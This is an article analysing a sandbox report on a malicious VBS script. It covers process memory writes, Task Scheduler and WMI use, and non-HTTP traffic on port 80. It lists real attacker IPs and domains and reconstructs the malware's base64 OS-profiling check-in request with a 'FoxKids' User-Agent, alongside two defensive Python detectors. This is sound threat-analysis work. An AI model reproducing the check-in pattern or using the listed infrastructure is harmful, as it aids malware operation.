The source data, drawn from a Hybrid Analysis sandbox report, documents a malicious Visual Basic Script (VBS) file named MSG_590271.vbs, approximately 5.4 MiB in size. That is unusually large for a script and on its own suggests heavy padding or an embedded, encoded payload. Because a VBS file runs under the Windows Script Host, the process the report attributes its behaviour to is wscript.exe. The report's "installs hooks/patches the running process" indicator records wscript.exe writing bytes into memory belonging to loaded modules, including WSHIP6.DLL, WSHTCPIP.DLL, MSCORWKS.DLL and NSI.DLL; these are in-process memory writes, not modifications of the DLL files on disk, and writes into the Winsock helper libraries are a low-confidence indicator in isolation because sandbox instrumentation can produce similar records. The report also shows the script loading the Task Scheduler COM API (taskschd.dll) and touching registry keys and files associated with the script host itself (wscript.exe, wshom.ocx) and the locale sorting-default tables. Loading taskschd.dll is consistent with an attempt to create a scheduled task for persistence; the script-host and sorting-table accesses, by contrast, occur for any script hosted by wscript.exe and are not indicators by themselves.
On the network side, the report records TCP connections to several addresses on port 80 that do not begin with an HTTP header, alongside ordinary HTTP requests. The contacted IP addresses are 95.216.112.243, 5.175.14.93, 178.33.235.187 and 178.62.221.228, and the associated domains are b1-beautysalon.com, globalbeauty-kosmetik.de, thecricketstudio.com and cibankdubai.com. The HTTP traffic includes a GET request to b1-beautysalon.com and globalbeauty-kosmetik.de for /wp-content/uploads/2020/03/turn/444444.png?uid=..., where the uid parameter is a base64-encoded string. Decoding it yields "Microsoft Windows 7 Professional", which matches the Caption value WMI reports for Win32_OperatingSystem, so the request both fetches what is presented as an image and reports the victim's operating system to the server. The report excerpt does not show what the server returned, so whether 444444.png carried a second-stage payload cannot be confirmed from this data; the request pattern itself, however, is a usable indicator of the actor's infrastructure.
The file name MSG_590271.vbs reads like a generic message or notification attachment rather than a beauty-product offer, and the four domains (names suggesting a beauty salon, a cosmetics retailer, a cricket studio and a bank) share no theme. Together with the /wp-content/uploads/ path, which is the WordPress media directory, this is more consistent with compromised legitimate websites being used to stage the malware than with sites built around a beauty lure. The data therefore does not establish a "free sample" campaign, and nothing in it confirms one. That said, freebie and sample themes are a common social-engineering hook, and consumers searching for them should treat unexpected script attachments with suspicion regardless of theme. The technically notable point is the traffic sent to port 80 without an HTTP header: port-based firewall rules and naive proxy policies that allow "web" traffic by port alone will pass it, while any inspection that expects an HTTP request line sees an unexplained binary stream. That mismatch is itself a detection opportunity.
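To make the port-80 indicator concrete, here is an added example, written for this article and not part of the Hybrid Analysis report, that classifies the first bytes of each outbound TCP flow: a flow to port 80 is flagged unless its payload starts with a well-formed HTTP/1.x request line, and an HTTP/1.1 request line followed by no headers at all is flagged too, since HTTP/1.1 requires a Host header. The flow records are constructed; the destination addresses reuse the IPs the report lists, but the payload bytes are invented.

```python
"""Flag TCP flows on port 80 that do not carry an HTTP request.

Added example for this article. The flow records at the bottom are constructed:
destination IPs reuse those listed in the report, payload bytes are invented.
"""
import re
from typing import Any, Dict, List, Optional

# RFC 7230 request line: METHOD SP request-target SP HTTP/1.<minor> CRLF.
_REQUEST_LINE = re.compile(
    rb"^(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|CONNECT|TRACE|PATCH) "
    rb"[^ \r\n]+ HTTP/1\.([01])\r\n"
)
# One header field line: token ':' value CRLF.
_HEADER_LINE = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+:[^\r\n]*\r\n")


def classify_payload(payload: bytes) -> Optional[str]:
    """Return None if the payload looks like an HTTP/1.x request, else a reason.

    HTTP/1.1 mandates a Host header, so a 1.1 request line followed directly by
    the blank line is treated as a protocol violation worth a look.
    """
    m = _REQUEST_LINE.match(payload)
    if m is None:
        return "no HTTP request line"
    if m.group(1) == b"1" and not _HEADER_LINE.match(payload[m.end():]):
        return "HTTP/1.1 request line without headers"
    return None


def triage_flows(flows: List[Dict[str, Any]]) -> List[Dict[str, str]]:
    """Return findings for port-80 flows whose first bytes are not HTTP.

    Each flow is {"dst": ip, "dport": int, "payload": first bytes sent}. This
    mirrors the report's indicator "sends traffic on typical HTTP outbound
    port, but without HTTP header".
    """
    findings = []
    for flow in flows:
        if flow["dport"] != 80:
            continue
        reason = classify_payload(flow["payload"])
        if reason is not None:
            findings.append({
                "dst": flow["dst"],
                "reason": reason,
                "preview": flow["payload"][:16].hex(),
            })
    return findings


# Constructed sample flows (not captured traffic).
SAMPLE_FLOWS: List[Dict[str, Any]] = [
    {   # well-formed HTTP request: not flagged
        "dst": "95.216.112.243", "dport": 80,
        "payload": (b"GET /wp-content/uploads/2020/03/turn/444444.png"
                    b"?uid=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWw%3D HTTP/1.1\r\n"
                    b"Host: b1-beautysalon.com\r\nUser-Agent: FoxKids\r\n\r\n"),
    },
    {   # opaque binary on port 80: flagged
        "dst": "5.175.14.93", "dport": 80,
        "payload": b"\x17\x03\x01\x00\x20" + bytes(range(32)),
    },
    {   # request line but no Host header: flagged
        "dst": "178.33.235.187", "dport": 80,
        "payload": b"GET / HTTP/1.1\r\n\r\n",
    },
    {   # not port 80: ignored by this check
        "dst": "178.62.221.228", "dport": 443,
        "payload": b"\x16\x03\x01\x02\x00",
    },
]

if __name__ == "__main__":
    for finding in triage_flows(SAMPLE_FLOWS):
        print(finding)
```

Run against real data by feeding the first payload bytes of each flow from a packet capture or a flow collector that stores payload prefixes; the hex preview of a flagged flow is usually enough to recognise TLS, a custom binary protocol or plain garbage.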
The script also interacts with Windows Management Instrumentation (WMI) and other COM objects: the registry touches include the entries for the WMI interfaces IWbemServices and IEnumWbemClassObject, which a script exercises when it queries WMI (for example to read the operating-system caption that appears in the uid parameter), and for ADODB.Stream, which scripts commonly use to write downloaded bytes to disk. The loading of mscorlib.ni.dll, together with the MSCORWKS.DLL noted above, shows that the .NET runtime was brought into the wscript.exe process; a VBS file can do this by instantiating COM-visible .NET classes, a common way for a script to reach encoding, compression or cryptographic functionality it otherwise lacks. Finally, the HTTP request carries the User-Agent string "FoxKids". It is not a browser user agent, so the attacker's server can use it to tell infected hosts from casual visitors, and defenders can match on it in proxy logs.
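The following added example, again written for this article and not taken from the report, pulls the indicators described in the two preceding network paragraphs out of a raw HTTP request: it URL-decodes the query string, decodes any parameter that is well-formed base64 and yields printable text, checks the result against the shape of a Windows OS caption, and notes a non-browser User-Agent. The request text is constructed from the fields the report names (the path, the uid parameter, the hosts and the FoxKids User-Agent); the rule that a browser User-Agent starts with "Mozilla/" is a simplifying assumption of the example.

```python
"""Extract host-profiling indicators from an HTTP request.

Added example for this article; the request below is constructed from the
fields the report names and is not copied from the report.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Hosts the report associates with the sample.
REPORTED_HOSTS = {
    "b1-beautysalon.com", "globalbeauty-kosmetik.de",
    "thecricketstudio.com", "cibankdubai.com",
}
IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif")
# Shape of a Win32_OperatingSystem.Caption value, e.g. "Microsoft Windows 7 Professional".
OS_CAPTION = re.compile(r"^Microsoft Windows [0-9A-Za-z][0-9A-Za-z .]*$")
_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def try_base64(value: str) -> Optional[str]:
    """Decode value if it is well-formed base64 that yields printable ASCII text."""
    if len(value) % 4 != 0 or not _B64_ALPHABET.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text.isprintable() else None


def extract_indicators(raw: str) -> Dict[str, object]:
    """Return the fields a defender would pivot on, plus the reasons it looks bad."""
    _method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    decoded: Dict[str, str] = {}
    for key, value in parse_qsl(parts.query):   # parse_qsl also URL-decodes %3D -> '='
        plain = try_base64(value)
        if plain is not None:
            decoded[key] = plain

    reasons: List[str] = []
    host = headers.get("host", "")
    if host in REPORTED_HOSTS:
        reasons.append(f"host {host} listed in report")
    if parts.path.lower().endswith(IMAGE_EXTENSIONS) and decoded:
        reasons.append("image path carrying a base64-encoded query parameter")
    for key, plain in decoded.items():
        if OS_CAPTION.match(plain):
            reasons.append(f"parameter {key} decodes to an OS caption: {plain!r}")
    user_agent = headers.get("user-agent", "")
    # Assumption for this example: browsers announce themselves as "Mozilla/...".
    if user_agent and not user_agent.startswith("Mozilla/"):
        reasons.append(f"non-browser User-Agent {user_agent!r}")

    return {"host": host, "path": parts.path, "decoded_params": decoded,
            "user_agent": user_agent, "reasons": reasons}


# Constructed request modelled on the one in the report.
SAMPLE_REQUEST = (
    "GET /wp-content/uploads/2020/03/turn/444444.png"
    "?uid=TWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWw%3D HTTP/1.1\r\n"
    "Host: b1-beautysalon.com\r\n"
    "User-Agent: FoxKids\r\n"
    "Connection: close\r\n"
    "\r\n"
)

if __name__ == "__main__":
    result = extract_indicators(SAMPLE_REQUEST)
    print(result["decoded_params"])   # {'uid': 'Microsoft Windows 7 Professional'}
    for reason in result["reasons"]:
        print("-", reason)
```

The base64 check deliberately requires a length that is a multiple of four, a clean alphabet and a printable result, which keeps ordinary tokens and session IDs from being reported as decoded text; the OS-caption pattern is the part to extend if a campaign encodes other WMI fields in the same way.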
The source data says nothing about Gumtree, Aylesbury or legitimate freebie offers; it is solely a technical analysis of a malicious file, so no claim about free-sample availability on Gumtree or in Aylesbury can be made from it. This article is accordingly limited to the threat the analysis identifies and to the web properties, beauty-related and otherwise, associated with it.
Consumers seeking free samples should be cautious about downloading files or following links from unverified sources. Legitimate brand sample programmes do not require running a standalone script file such as a .vbs; they use sign-up forms on the brand's own website. Note that Windows hides known file extensions by default, so a file named MSG_590271.vbs may be displayed simply as MSG_590271, and a script icon is easy to overlook; double-clicking it hands the file to wscript.exe with the user's full privileges, which is exactly the execution path the report describes. The domains b1-beautysalon.com and globalbeauty-kosmetik.de should be treated as infrastructure associated with this threat and blocked or monitored accordingly.
The report lists the specific bytes written and the memory addresses they were written to inside wscript.exe, which is what underlies the in-process hooking indicator discussed above. Access to files in the Windows directory and the loading of taskschd.dll point to an interest in the task scheduler, one of the most common persistence mechanisms available to a script running without administrative rights. The connections on port 80 that carry no HTTP header are a simple but effective evasion of port-based filtering, and the base64 encoding of the uid parameter is a light obfuscation of the data sent to the server: it hides the operating-system string from casual inspection but is trivially reversible, as the decoded value shows.
In summary, the data describes a malicious VBS script that uses a set of unrelated, apparently compromised websites, two of them beauty-related, for network communication and probable payload retrieval. It writes into the memory of its own host process, touches the WMI, Task Scheduler and ADODB COM components, loads the .NET runtime and sends both raw and HTTP traffic on port 80. The data does not confirm any promotional or free-sample offer; the analysis is strictly technical and identifies infrastructure and behaviour patterns.
Conclusion
The source data details a malicious VBS script (MSG_590271.vbs) targeting Windows systems. Its network infrastructure includes the beauty-related domains b1-beautysalon.com and globalbeauty-kosmetik.de alongside unrelated sites, used for check-in and likely payload retrieval. The malware writes into its host process's memory, drives the registry and system components through COM, loads the .NET runtime and sends non-HTTP traffic on port 80. The beauty-themed domains do not by themselves establish a free-sample lure, and the data confirms no legitimate offer. Consumers should nevertheless be wary of malware disguised as promotional offers and rely only on official brand channels for sample requests; defenders should block the listed domains and IP addresses and alert on the request pattern and User-Agent described above.
